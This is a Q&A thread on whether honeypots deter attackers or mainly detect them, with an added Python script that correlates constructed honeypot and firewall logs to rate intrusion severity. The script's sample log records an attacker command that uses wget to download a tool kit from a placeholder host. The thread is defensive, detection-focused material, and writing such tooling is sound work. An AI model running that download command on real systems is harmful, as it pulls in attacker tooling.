34

According to Microsoft, adding a honeypot to your corporate network is an effective way to deter hackers from compromising your network.

Aren't honeypots more for research purposes and not ideal for corporate networks?

Wouldn't having a honeypot on your corporate network likely give a hacker a better foothold for making attacks?

More information:

Security Fundamentals (Microsoft Virtual Academy). The quiz for #4 made that claim. I answered based on my understanding in the security field and got it wrong. Hence my confusion.

Jason
  • Where does Microsoft claim that? Please post a link so we can see the context and read their reasoning behind this claim. – Philipp Jun 17 '14 at 19:58
  • http://www.microsoftvirtualacademy.com/training-courses/security-fundamentals -- The quiz for #4 made that claim. I answered based on my understanding in the security field and got it wrong. Hence my confusion. Maybe it was just a typo? – Jason Jun 17 '14 at 20:32
  • I would assume it was a mistaken word choice. – schroeder Jun 17 '14 at 20:36
  • This question can be improved by adding a screenshot and/or the quiz item to this question. – 40XUserNotFound Jun 17 '14 at 22:53
  • @Cupcake So, what are you waiting for? – Pierre Arlaud Jun 20 '14 at 09:06
  • [Microsoft has 1 million servers, although nobody seems to be sure why](https://what-if.xkcd.com/63/) -- heh, now I know! – Damon Jun 20 '14 at 10:23

5 Answers

51

Deploying a honeypot is not unlike adding a painted door or a fake safe to a bank vault.

It does not deter anybody (its purpose is not to be detected as a honeypot). Possibly someone misspelled detect.

It can reduce (somewhat) the time spent by attackers against the real door. Not by much.

More than that, it can be optimized for data gathering (simplistically, you know nobody is going to ever use the services on the honeypot, so you can tune them all to "log everything high volume paranoid dump dump dump"). Service efficiency goes to hell, but as soon as someone attempts anything you need to guess nothing. The "safe" is all alarms, and no bullion.

Even more, you can correlate what is happening on the honeypot with what is going on in the rest of the network. The honeypot will tell you what's behind what the other machines report as unusual but random "noise".

Finally, the honeypot can apparently allow an attack to succeed, so that you can gather yet more data. Example: the attacker wins a root shell on the honeypot. He proceeds to download more sophisticated tools. Now you have, at the very least, a copy of those tools as well as an idea of where he downloaded them from.

(If you have time you can crash the connection in a not-too-suspicious way and let him reconnect later, after having added suitable instrumentation to his tools, which are now no longer his.)

You can determine whether he's just a script kid looking for some warez bouncing, or someone who actively targeted your network. Even by avoiding the honeypot he will tell you something that's worth knowing.

But pretty much nothing of the above comes for free; nor will it work by itself. You need someone continuously managing (normally at a very low level, but continuously and always ready to escalate) the honeypot. The honeypot has to be maintained and updated, just as much (possibly much more) than the other boxes.

You have to decide whether the gain is worth the pain, and whether you can invest in the necessary pain.

Just "adding a honeypot" will do nothing to increase the network security; to the contrary, it will engender a bit of false security, and possibly provide a security breach if the honeypot isn't as well insulated and armored-in as you believed; it might also attract more attention than if it weren't there, if it offers services or vulnerabilities the other machines don't share.

LSerni
20

Honeypots are not a deterrent control, they are a detective control. As such, they can be very powerful in corporate, production networks.

I run many honeypots and they provide a useful set of data apart from IDS/IPS. They can tell me the intent of an active attack, the sophistication of an attack, and any contact with a honeypot indicates a serious event. Sometimes, I see what are obviously people 'looking around', and other times I see very complex and planned attacks. Both need to be dealt with and I know how seriously to apply resources to investigate.

Properly configured and secure honeypots do not allow attackers to pivot to other assets (although some can make the attacker think they are!).

It is also true that honeypots can be used for research. I run my own honeypot for that very purpose. But, as an inexpensive detective control, it adds depth to what is usually only seen in logs and packet traces.

schroeder
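The two answers above make the same operational point: nobody legitimately uses the honeypot, so any contact is an incident, and the honeypot's hits explain the "noise" other machines report. The script below is an added example (not code from either answerer) that correlates constructed honeypot and firewall log lines in a made-up `ts sensor key=value` format and rates each source's intent; the download URL is a placeholder.

```python
# Added example: correlate honeypot contacts with ordinary firewall logs so the
# "random noise" seen elsewhere gets an explanation. Log formats are constructed.
import re
from collections import defaultdict

HONEYPOT_LOG = """\
2014-06-17T19:58:01 hp src=10.0.5.23 dport=22 event=connect
2014-06-17T19:58:04 hp src=10.0.5.23 dport=22 event=login_success user=root
2014-06-17T19:58:09 hp src=10.0.5.23 dport=22 event=exec cmd="wget http://placeholder.invalid/kit.tgz"
2014-06-17T20:01:00 hp src=10.0.9.8 dport=80 event=connect
"""
FIREWALL_LOG = """\
2014-06-17T19:57:30 fw src=10.0.5.23 dst=10.0.1.10 dport=445 action=deny
2014-06-17T19:57:31 fw src=10.0.5.23 dst=10.0.1.11 dport=445 action=deny
2014-06-17T19:57:40 fw src=10.0.5.23 dst=10.0.1.12 dport=22 action=allow
2014-06-17T20:00:10 fw src=10.0.7.7 dst=10.0.1.10 dport=443 action=allow
"""
KV = re.compile(r'(\w+)=("[^"]*"|\S+)')  # key=value, value may be quoted

def parse(log):
    """Group 'ts sensor k=v ...' lines by source address; quoted values keep spaces."""
    by_src = defaultdict(list)
    for line in log.splitlines():
        ts, sensor, rest = line.split(" ", 2)
        e = {k: v.strip('"') for k, v in KV.findall(rest)}
        e.update(ts=ts, sensor=sensor)
        by_src[e["src"]].append(e)
    return by_src

def severity(hits):
    """Contact alone is already an incident (nobody should be there); a login
    or command execution means a hands-on attacker rather than a scanner."""
    kinds = {e["event"] for e in hits}
    if "exec" in kinds:
        return "critical"
    if "login_success" in kinds:
        return "high"
    return "medium"  # someone 'looking around'

def correlate(honeypot_log, firewall_log):
    """For every source seen on the honeypot, pull up its firewall activity."""
    fw_by_src = parse(firewall_log)
    report = {}
    for src, hits in parse(honeypot_log).items():
        fw = fw_by_src.get(src, [])  # .get: don't create entries for new keys
        report[src] = {"severity": severity(hits), "honeypot_hits": len(hits),
                       "other_hosts_touched": sorted({e["dst"] for e in fw}),
                       "denied_elsewhere": sum(e["action"] == "deny" for e in fw)}
    return report
```

Sources that appear only in the firewall log (10.0.7.7 here) are left alone; only honeypot contacts are escalated, which is what keeps the false-positive rate of this control near zero.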
8

The question reminded me of an article from a not so distant past that surprised me with a similar claim. I was able to find it again: it was "5 Reasons Every Company Should Have A Honeypot" on Dark Reading from October 2013. Summarized, their five reasons are:

  1. Attackers test their tools against standard anti-malware software, so a honeypot as a system with low false positives will be good to detect attacks.
  2. Honeypots can slow down attackers by setting up decoys and distracting them from the real targets.
  3. Production honeypots do not require much time investment (compared to research honeypots) unless an alert is triggered.
  4. Honeypots help train the security team.
  5. Honeypots are cheap to set up, because there are lots of free tools.

I do not really agree with all their reasons. In fact, the only convincing one for me is #4. Number 2 might be valid, but needs either a sophisticated and probably expensive setup or only inexperienced attackers. Otherwise, they might be able to look behind the curtain very soon and look for the real assets (maybe even exploiting some weakness in the honeypot software itself).

Dubu
4

Honeypots are not a defensive mechanism. They are a medium that can emulate your network and can help you in identifying potential threats on your network. Setting up honeypots in corporate networks can give you an insight into any attacks that are directed towards your corporation. Based on the results captured in your honeypot, you can further strengthen your organizational defence mechanisms.

abhinav singh
  • Your answer is correct, except for the first sentence. Honeypots **are** a defensive mechanism. The defence is all around detection and alerting. – Rory Alsop Jun 18 '14 at 08:28
4

Although its primary purpose is in detection and mitigation, I can see how it would also act as a deterrent, if the attacker had reasonable suspicion you use honeypots, but didn't have a way to determine exactly where. Whether a specific machine is a honeypot should be kept secret, but there's little risk in disclosing the fact that some of your machines among hundreds are honeypots. For governments, large businesses, and security-sensitive smaller businesses, you would pretty much assume they use honeypots.

Think of it this way. Everything else being equal, if you had the choice between attacking an installation that probably has honeypots and one that probably doesn't, which would you choose? Of course, it's not a very large deterrent, but what is?

Karl Bielefeldt